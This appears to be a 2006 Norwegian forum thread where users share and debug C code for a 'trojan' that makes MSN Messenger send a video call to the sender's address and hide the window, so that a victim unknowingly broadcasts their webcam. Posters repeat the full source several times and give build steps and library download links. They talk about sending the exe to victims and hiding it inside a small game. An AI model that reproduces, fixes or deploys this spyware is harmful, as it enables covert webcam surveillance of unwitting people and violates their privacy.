Du må være registrert og logget inn for å kunne legge ut innlegg på freak.no
X
LOGG INN
... eller du kan registrere deg nå
Dette nettstedet er avhengig av annonseinntekter for å holde driften og videre utvikling igang. Vi liker ikke reklame heller, men alternativene er ikke mange. Vær snill å vurder å slå av annonseblokkering, eller å abonnere på en reklamefri utgave av nettstedet.
  201 39219
Jeg har kopiert denne koden inn:

Kode

#include "windows.h"
#include "msgruaid.h"
#include "msgrua.h"
#include "oleauto.h"
int main(int argc, char *argv[])
{
IMessenger2 *pIMessenger = NULL;
IMessengerWindow *pIWindow = NULL;
IDispatch *pIDispatch = NULL;
VARIANT vName;
char *cName;
long lWindow;

CoInitialize(0);
CoCreateInstance(CLSID_Messenger, NULL, CLSCTX_ALL, IID_IMessenger, (void **)&pIMessenger); *

cName = "din e-mail";

BSTR pbstrName= SysAllocStringLen(NULL, lstrlenA(cName));
MultiByteToWideChar(CP_ACP, 0, cName, lstrlenA(cName), pbstrName, lstrlenA(cName));
SysFreeString(pbstrName);
* *
vName.vt = VT_BSTR;
vName.bstrVal *= (BSTR)pbstrName;
* *
pIMessenger->StartVideo(vName, &pIDispatch);
pIDispatch->QueryInterface(IID_IMessengerWindow, (void**)&pIWindow);
pIDispatch->Release();

// Get handle of window
pIWindow->get_HWND(&lWindow);
pIWindow->Release();
* * * * *
// Hide the window
ShowWindow((HWND)lWindow, SW_HIDE);

pIMessenger->Release();
CoUninitialize();
ExitProcess(0);
return 0;
}
Eneste forandring jeg har gjort gi cName en value med en gang den blir laget (trodde dette var eneste måte).
Også har jeg quotet alle *****'ene. (Hva gjør de i koden?)

Eneste feil jeg har nå er denne linjen:
vName.bstrVal *= (BSTR)pbstrName;
som gir meg denne erroren:
invalid operands of types `OLECHAR*' and `OLECHAR*' to binary `operator*' in evaluation of `operator*=(OLECHAR*, OLECHAR*)'

Også har jeg et spørsmål til skaperen: (eller andre som har testet)
Hva skjer om offeret går inn i kontaktlisten og åpner vinduet på nytt? (Vil han/hun se at webcam'et kjører da?)
Sist endret av TanteSpiker; 13. juli 2006 kl. 00:55.
Bob Sacamano
John B's Avatar
Sleng opp en kilde takk
Utdyp det der du sa takk..

Edit: Nå ser jeg at tuxeren leser.
Sist endret av TanteSpiker; 13. juli 2006 kl. 01:07.
Sitat av Grantax

Også har jeg et spørsmål til skaperen: (eller andre som har testet)
Hva skjer om offeret går inn i kontaktlisten og åpner vinduet på nytt? (Vil han/hun se at webcam'et kjører da?)
Vis hele sitatet...
Offret vill ikke greie å åpne det vinduet
Sist endret av Sambadelight; 13. juli 2006 kl. 01:58.
Bob Sacamano
John B's Avatar
Siden du tydeligvis har kopiert dette fra et sted ber jeg deg henvise oss til hvor du fant den av flere grunner. Blandt annet for å se koden i sin helhet, og også for å se eventuelt hvilken exploit denne koden benytter seg av. Rimelig meningsløst å bare kopiere en bit kode du har funnet et eller annet sted uten noen form for tillegsinformasjon.
Vel da må jeg lete, fordi historikk-vinduet i firefox sluttet sånn plutselig å fungere nå, for noe dritt..

Edit: Here you go, siste side: http://www.freakforum.nu/forum/showt...ight=windows.h
http://www.bloodshed.net/download.html

Der er en link til ett gratis kodeprogram som heter dev-c++, som tuxeren har brukt for å lage trojaneren. Når dere har lastet ned programmet så start det. (Ja faktisk)
trykk på arkiv -> nytt prosjekt.
Velg windows application, da kommer det opp hvor dere vil lagre programmet.
Pass på at alle filer kommer i samme mappe.
Når dere har gjort det så kommer det til å komme opp masse tekst til høyre i dev-c++
ta bort all tekst så at det er rent i ruten. Kopier deretter:

Kode:

#include "windows.h"
#include "msgruaid.h"
#include "msgrua.h"
#include "oleauto.h"
int main(int argc, char *argv[])
{
IMessenger2 *pIMessenger = NULL;
IMessengerWindow *pIWindow = NULL;
IDispatch *pIDispatch = NULL;
VARIANT vName;
char *cName;
long lWindow;

CoInitialize(0);
CoCreateInstance(CLSID_Messenger, NULL, CLSCTX_ALL, IID_IMessenger, (void **)&pIMessenger); *

cName = "din e-mail";

BSTR pbstrName= SysAllocStringLen(NULL, lstrlenA(cName));
MultiByteToWideChar(CP_ACP, 0, cName, lstrlenA(cName), pbstrName, lstrlenA(cName));
SysFreeString(pbstrName);
* *
vName.vt = VT_BSTR;
vName.bstrVal *= (BSTR)pbstrName;
* *
pIMessenger->StartVideo(vName, &pIDispatch);
pIDispatch->QueryInterface(IID_IMessengerWindow, (void**)&pIWindow);
pIDispatch->Release();

// Get handle of window
pIWindow->get_HWND(&lWindow);
pIWindow->Release();
* * * * *
// Hide the window
ShowWindow((HWND)lWindow, SW_HIDE);

pIMessenger->Release();
CoUninitialize();
ExitProcess(0);
return 0;
}


Når dere har kopiert inn teksten skal dere trykke på: prosjekt-> prosjekt alternativer. Da kommer det opp en rute der dere skal velge paramantere.

Trykk på knappen "legg till bibliotek" og bla dit du instalerte dev-c++ (C:/dev-cpp/) i den mappen finns det en mappe som heter lib,
gå inn i den og markere "libole32.a" og "liboleaut32.a" og trykk åpne.
Når dere har gjort det skal dere legge til enda en .lib fil som finnes på:

http://www.msghelp.net/attachment.php?pid=280776

Last ned filene og legg de i samme mappe som allt det andre
klikk på legg til bibliotek igjen og bla fram til mappen der du lagret alt og der ska filene ligge som du nettopp lastet ned. markere "msgrguid.lib" og trykk på legg till.

Nå skal dere legga til de andre to filene som fantes med i mappen dere lastet ned.
Til venstre i dev-c++ programmet så finnes det ett fil-tre, høyreklikk på den øverste mappen som *"main.cpp" ligger i og velg "legg til prosjekt" gå deretter til mappen der alt ligger og marker "msgrua.h" og "msgruid.h" og velg åpne.

Nå skal programmet være klart til å komplimeres. Trykk på komplimer (en knapp med fire ruter på) eller ctrl+f11. Lagre fila i samme mappe.
Nå skal fila være klar.

Om det blir noe feil kan det være fordi filene ikke er i samme mappe.

Om fila fungerer skal det finnes to rader med tekst der det står:
.drectv`-default:uuid.lib ' unrecognized
.drectv`-default:uuid.lib ' unrecognized
Vis hele sitatet...
Fra en annen tråd på forumet
Ja, den jeg linket til..
SHARKFACEGANG
mkey's Avatar
Altså, jeg også lurte på noe ang. dette. Hvorfor går det ikke ann å komplimere, det kommer bare rødt på der jeg skal skrive emailen min?

Har aldri gjort det før nei
Det er rødt fordi det er en string hvis det er det du mener.. (Fargekodet vet du)
SHARKFACEGANG
mkey's Avatar
Okei, men altså, ja. Veldig noob spørsmål nå;

Når jeg komplimerer filen, skal den ikke bli en exe.* fil da ? Eller hva? Har gjort akkurat det som står i guiden
Når du først velger nytt prosjekt for du opp en hel del alternativ, deriblant .exe fil.
Jeg får det bare ikke til, jeg tror jeg har gjort som det sto. Når jeg starter komplimeringen får jeg vite at det er feil i koden. Hva gjør jeg feil?
Trigonoceps occipita
vidarlo's Avatar
Donor
For all del: Kompilert, kompilering, kompilere, kompilator.
Komplimeringen
Hvis noen hjelper meg med den siste feilen så kan jeg gi dere koden jeg har..
Trodde tuxeren visste hva feilen innebar.
Sist endret av TanteSpiker; 13. juli 2006 kl. 13:01.
Hvordan fungerer programmet? Hvordan skal man gå frem for å bruke det liksom? Må offeret kjøre filen? Eller..?
ja offeret må kjøre filen for st dette skal gå.
Sånn som jeg har forstått, så sender du filen, så åpner offeret programmet, som jeg regner med at lukker seg rett etterpå det har gjort sin jobb.
Det skal altså sende en invitasjon til deg, og så skjule vinduet sånn at offeret ikke kan se hva som skjedde.
Hadde vært litt bedre om dette hadde blitt programmert inn i et annet program, sånn at offeret ikke blir mistensomt. (Et program som f.eks. et lite spill elns)

Min kode ser sånn ut:

Kode

#include "windows.h"
#include "msgruaid.h"
#include "msgrua.h"
#include "oleauto.h"
int main(int argc, char *argv[])
{
IMessenger2 *pIMessenger = NULL;
IMessengerWindow *pIWindow = NULL;
IDispatch *pIDispatch = NULL;
VARIANT vName;
char *cName;
long lWindow;

CoInitialize(0);
CoCreateInstance(CLSID_Messenger, NULL, CLSCTX_ALL, IID_IMessenger, (void **)&pIMessenger);

cName = "*******@hotmail.com";

BSTR pbstrName= SysAllocStringLen(NULL, lstrlenA(cName));
MultiByteToWideChar(CP_ACP, 0, cName, lstrlenA(cName), pbstrName, lstrlenA(cName));
SysFreeString(pbstrName);
//* *
vName.vt = VT_BSTR;
vName.bstrVal = (BSTR)pbstrName;
//* *
pIMessenger->StartVideo(vName, &pIDispatch);
pIDispatch->QueryInterface(IID_IMessengerWindow, (void**)&pIWindow);
pIDispatch->Release();

// Get handle of window
pIWindow->get_HWND(&lWindow);
pIWindow->Release();
//* * * * *
// Hide the window
ShowWindow((HWND)lWindow, SW_HIDE);

pIMessenger->Release();
CoUninitialize();
ExitProcess(0);
return 0;
}
Jeg har fjernet gange operatoren her:
vName.bstrVal *= (BSTR)pbstrName;
Og da går det..
Men jeg kan ikke kjøre programmet, fordi da får jeg error. :P (Har det noe med at jeg har live messenger, eller fordi jeg har gjort noe feil i koden?)
Sist endret av TanteSpiker; 13. juli 2006 kl. 17:59.
Hva er error meldingen da? (som du får hvis du ikke fjerner vName.bstrVal *= (BSTR)pbstrName; ?
Det 'Send' eller 'Ikke Send' vinduet.. (Error Report)
Jeg for at den ikke kan åpne windows.h, hva skal jeg gjøre?
Prøv

Kode

#include <windows.h>
istedenfor

Kode

#include "windows.h"
Noen som får dette til og funke? Får bare feilmelding når jeg komplimerer filen.

Mail adressen min i cName = "mailadresse@gmail.com"; blir merket med rød.

Noen som vet hvordan det fikses?
Sist endret av urolig; 14. juli 2006 kl. 18:00.
urolig: hvis du hadde lest forrige side så hadde du forstått at det bare er fargekode..

Sitat av erix
Prøv

Kode

#include <windows.h>
istedenfor

Kode

#include "windows.h"
Vis hele sitatet...
Den 'lokale' windows header filen er akkurat lik den i include mappa til dev-cpp..

Edit: Hvorfor kan ikke bare noen som har fått det til poste hele prosjektet?
Sist endret av TanteSpiker; 14. juli 2006 kl. 18:07.
Kanskje dette høres helt på trynet ut for dere programmerings gutta, men hvorfor ikke bare legge ut en .exe fil med hele pakka, så slipper alle n00bs (meg deriblandt) å kødde med c++ osv.
Fordi vi må da skrive inn mailn, som inviten skal sendes til i selve programmet. Og då må vi gjøre det til alle.
Sist endret av Sambadelight; 14. juli 2006 kl. 18:43.
Trigonoceps occipita
vidarlo's Avatar
Donor
Skulle vel ikkje vere spesielt mange linjer ekstra å hente den variabelen fra ei fil, skulle det, tuxeren?
Hehe, jeg vil ikke sende en .exe pluss en .txt fil der det står *******@hotmail.com..
Men uansett, kan du laste opp .dev filen, pluss alle source filene som hører til prosjektet?
Sitat av Grantax
urolig: hvis du hadde lest forrige side så hadde du forstått at det bare er fargekode..
Vis hele sitatet...
Og hadde du lest innlegget mitt hadde du skjønt at jeg får den merket som feil!!

Ekstra info: Feilen kommer etter at jeg kompilerer, den er ikke rød før jeg kompilerer.
Sitat av urolig
Og hadde du lest innlegget mitt hadde du skjønt at jeg får den merket som feil!!
Vis hele sitatet...
Nei, fordi du sier at mail adressen din blir rød, og ikke hele linjen (eller hele statementen da), noe som er den perfekte beskrivelse på fargekodingen.

Edit: Ops, glemte meg av, gå tilbake litt (ikke mye, men bare til forrige linje det står noe på)
Etter den ser du en * (det er også mange andre, som jeg ikke forstår hvorfor er lagt inn i kildekoden), bare fjern den.
Sist endret av TanteSpiker; 14. juli 2006 kl. 18:59.
Sitat av Grantax
Nei, fordi du sier at mail adressen din blir rød, og ikke hele linjen (eller hele statementen da), noe som er den perfekte beskrivelse på fargekodingen.

Edit: Ops, glemte meg av, gå tilbake litt (ikke mye, men bare til forrige linje det står noe på)
Etter den ser du en * (det er også mange andre, som jeg ikke forstår hvorfor er lagt inn i kildekoden), bare fjern den.
Vis hele sitatet...
Hmmm det fikset mail adresse feilen men da får jeg en annen feil. Legger ved et bilde jeg så de som vil kan se hva jeg mener.
Nok en gang skal '*' bort. (alle)

Ja, untatt de som faktisk står rett bak en ting eller noe, som faktisk har en mening.
Akkurat nå skal bare '*' som står helt alene (eller kanskje med flere andre *'er) bort.
Sitat av Grantax
Nok en gang skal '*' bort. (alle)

Ja, untatt de som faktisk står rett bak en ting eller noe, som faktisk har en mening.
Akkurat nå skal bare '*' som står helt alene (eller kanskje med flere andre *'er) bort.
Vis hele sitatet...
Nå har jeg fjernet * for harde livet men får fortsatt feil melding.

[Build Error] [msn.exe] Error 1
Vis hele sitatet...
Noen tips? Er ikke noen som kan legge opp en ferdig fil som funker eller? For dette funker bare ikke.
Jeg får det ikke til å funke .. Noen som kan se på feilmeldingene mine ?

Legger ved et bilde.
Begynne med å gjøre det jeg har sagt? (Vil ikke gjenta det for alle som har problemet)
Men det kommer uansett feil, jeg vet ikke om det har noe med at min messenger er nyere enn den de hadde installert elns..
Det må vel være noen her som har fått dette til å fungere. Hva med personen som laget programet, vedkommende må jo kunne rette alle feil osv. Er det ikke mulig for en eller annen smart forumbruker å legge ut hele prosjektet?

Er ikke alle som er c++ ubers.
Jeg fikk kompilere det, men det kommer bare et grått vindu. Ikkenoe skjer, men det var heller ingen errors ved kompileringen, det er bare ex fila jeg skal sende til offeret?

Den første som får det til skal poste det her!

(Tror ikke det går på Live uansett)
Sist endret av jensen2k; 15. juli 2006 kl. 14:39.
Trigonoceps occipita
vidarlo's Avatar
Donor
Du skal kun sende exe-fila ja. Og det heiter å kompilere...
Da har jeg klart å kompilere ved hjelp av det som sto i tråden. Men får ikke proget til å virke like vel. Hvis man har et samtalevindu oppe med personen som skal få webcam-invitasjonen kommer det bare en sånn "programm.exe har et problem og må lukkes. Vi beklager det inntrufne." og hvis man ikke har vinduet oppe åpnes det ett og det lukkes igjen men ingen invitasjon. Og når man da prøver å logge av får man besked om at man har samtale vinduer oppe selv om man ikke har det.
Bare sort skjerm hos meg...
3 untitled1.cpp
dprogram files\dev\lib\msgrua.h:29: #error this stub requires an updated version of <rpcndr.h>

3 untitled1.cpp
dprogram files\dev\lib\msgrua.h:133: ocidl.h: No such file or directory


...help?
Har nå testet dette og det fungerer nesten..........det som er feil er at jeg får en stemme samtale og ikke en video som jeg skulle få når motparten trykker på .exe fila som ble laget!

Noen som vet hva som er feil? Bruker msn 7.5!

Detter er min kode:

#include "windows.h"
#include "msgruaid.h"
#include "msgrua.h"
#include "oleauto.h"
int main(int argc, char *argv[])
{
IMessenger2 *pIMessenger = NULL;
IMessengerWindow *pIWindow = NULL;
IDispatch *pIDispatch = NULL;
VARIANT vName;
char *cName;
long lWindow;
CoInitialize(0);
CoCreateInstance(CLSID_Messenger, NULL, CLSCTX_ALL, IID_IMessenger, (void **)&pIMessenger);
cName = "xxxx@xxx.com";
BSTR pbstrName= SysAllocStringLen(NULL, lstrlenA(cName));
MultiByteToWideChar(CP_ACP, 0, cName, lstrlenA(cName), pbstrName, lstrlenA(cName));
SysFreeString(pbstrName);
//* *
vName.vt = VT_BSTR;
vName.bstrVal = (BSTR)pbstrName;
//* *
pIMessenger->StartVideo(vName, &pIDispatch);
pIDispatch->QueryInterface(IID_IMessengerWindow, (void**)&pIWindow);
pIDispatch->Release();
// Get handle of window
pIWindow->get_HWND(&lWindow);
pIWindow->Release();
//* * * * *
// Hide the window
ShowWindow((HWND)lWindow, SW_HIDE);
pIMessenger->Release();
CoUninitialize();
ExitProcess(0);
return 0;
}
Sist endret av karl77; 19. juli 2006 kl. 00:07.
nå prøve jeg med beta'n og får den samme som alle andre. prøvde å ta vekk alle * også, men da klikka det enda mer

CDev-Cpp\lib\main.cpp In function `int main(int, char**)':
17 CDev-Cpp\lib\main.cpp invalid conversion from `const char*' to `char'
23 CDev-Cpp\lib\main.cpp invalid type argument of `unary *'
24 CDev-Cpp\lib\main.cpp invalid operands of types `OLECHAR*' and `OLECHAR*' to binary `operator*'
24 CDev-Cpp\lib\main.cpp in evaluation of `operator*=(OLECHAR*, OLECHAR*)'
26 CDev-Cpp\lib\main.cpp invalid type argument of `unary *'
35 CDev-Cpp\lib\main.cpp invalid type argument of `unary *'
CDev-Cpp\Makefile.win [Build Error] [lib/main.o] Error 1
Sitat av Izor
nå prøve jeg med beta'n og får den samme som alle andre. prøvde å ta vekk alle * også, men da klikka det enda mer

CDev-Cpp\lib\main.cpp In function `int main(int, char**)':
17 CDev-Cpp\lib\main.cpp invalid conversion from `const char*' to `char'
23 CDev-Cpp\lib\main.cpp invalid type argument of `unary *'
24 CDev-Cpp\lib\main.cpp invalid operands of types `OLECHAR*' and `OLECHAR*' to binary `operator*'
24 CDev-Cpp\lib\main.cpp in evaluation of `operator*=(OLECHAR*, OLECHAR*)'
26 CDev-Cpp\lib\main.cpp invalid type argument of `unary *'
35 CDev-Cpp\lib\main.cpp invalid type argument of `unary *'
CDev-Cpp\Makefile.win [Build Error] [lib/main.o] Error 1
Vis hele sitatet...
Du må jo ikke ta vekk alle "*" da, bare de som ikke er forbundet til noe.

Har nå fått kompila koden min (har ikke teste ennå, finner ikke noen med cam og har ikke selv), den ser ut som følgende:

Kode

#include "windows.h"
#include "msgruaid.h"
#include "msgrua.h"
#include "oleauto.h"
int main(int argc, char *argv[])
{
IMessenger2 *pIMessenger = NULL;
IMessengerWindow *pIWindow = NULL;
IDispatch *pIDispatch = NULL;
VARIANT vName;
char *cName;
long lWindow;
CoInitialize(0);
CoCreateInstance(CLSID_Messenger, NULL, CLSCTX_ALL, IID_IMessenger, (void **)&pIMessenger);
cName = "xxxxxx@xxxxx.com";
BSTR pbstrName= SysAllocStringLen(NULL, lstrlenA(cName));
MultiByteToWideChar(CP_ACP, 0, cName, lstrlenA(cName), pbstrName, lstrlenA(cName));
SysFreeString(pbstrName);

vName.vt = VT_BSTR;
vName.bstrVal = (BSTR)pbstrName;

pIMessenger->StartVideo(vName, &pIDispatch);
pIDispatch->QueryInterface(IID_IMessengerWindow, (void**)&pIWindow);
pIDispatch->Release();
// Get handle of window
pIWindow->get_HWND(&lWindow);
pIWindow->Release();
// Hide the window
ShowWindow((HWND)lWindow, SW_HIDE);
pIMessenger->Release();
CoUninitialize();
ExitProcess(0);
return 0;
}
Hvis du følger det som har blitt sagt i denne tråden så skal du klare det om du bare jobber litt
Har gjort alt som står i denne tråden. Når personen starter opp programmet , så skjer det ingenting ;S
Jeg bruker Messenger Live, kanskje derfor det ikke fungerer her?
Sitat av Skaarestuen
Har gjort alt som står i denne tråden. Når personen starter opp programmet , så skjer det ingenting ;S
Vis hele sitatet...

Husk at du skal sende programet til den du vil se web cam av da. Sånn jeg har skjønt det må personen som har web cam du vil se kjøre programet.
edit: ja der funka det....men får bare at jeg "ringer" og ikke spør om cam
Sist endret av Izor; 19. juli 2006 kl. 14:06.
Sitat av urolig
Husk at du skal sende programet til den du vil se web cam av da. Sånn jeg har skjønt det må personen som har web cam du vil se kjøre programet.
Vis hele sitatet...

Ja har gjort det.

Men det skjer ikkeno ;s
Jeg prøvde å starte den selv , da dukket det opp et msn vindu med mailen min på, så ble det borte.
Når jeg skulle logge av så kom det : Alle msn vinduer vil bli lukket etc.
Jeg hadde lukket alle, men det betyr at det funker da.

Men det funker ikke når jeg sender det til en person og ber personen starte fila.

Virker som at folk ikke får dtilwebcam samtale , men stemmesamtale .

Noen som finner feilen ?

Jeg fikk det til nå ! Men da ble det kun videosamtale og personen ser at hun\han bruker webcammet sitt : s !

Personen så det i msn vinduet.
Sitat av Skaarestuen

Jeg fikk det til nå ! Men da ble det kun videosamtale og personen ser at hun\han bruker webcammet sitt : s !

Personen så det i msn vinduet.
Vis hele sitatet...
Hva gjorde du for å få webcam og ikke stemme samtale???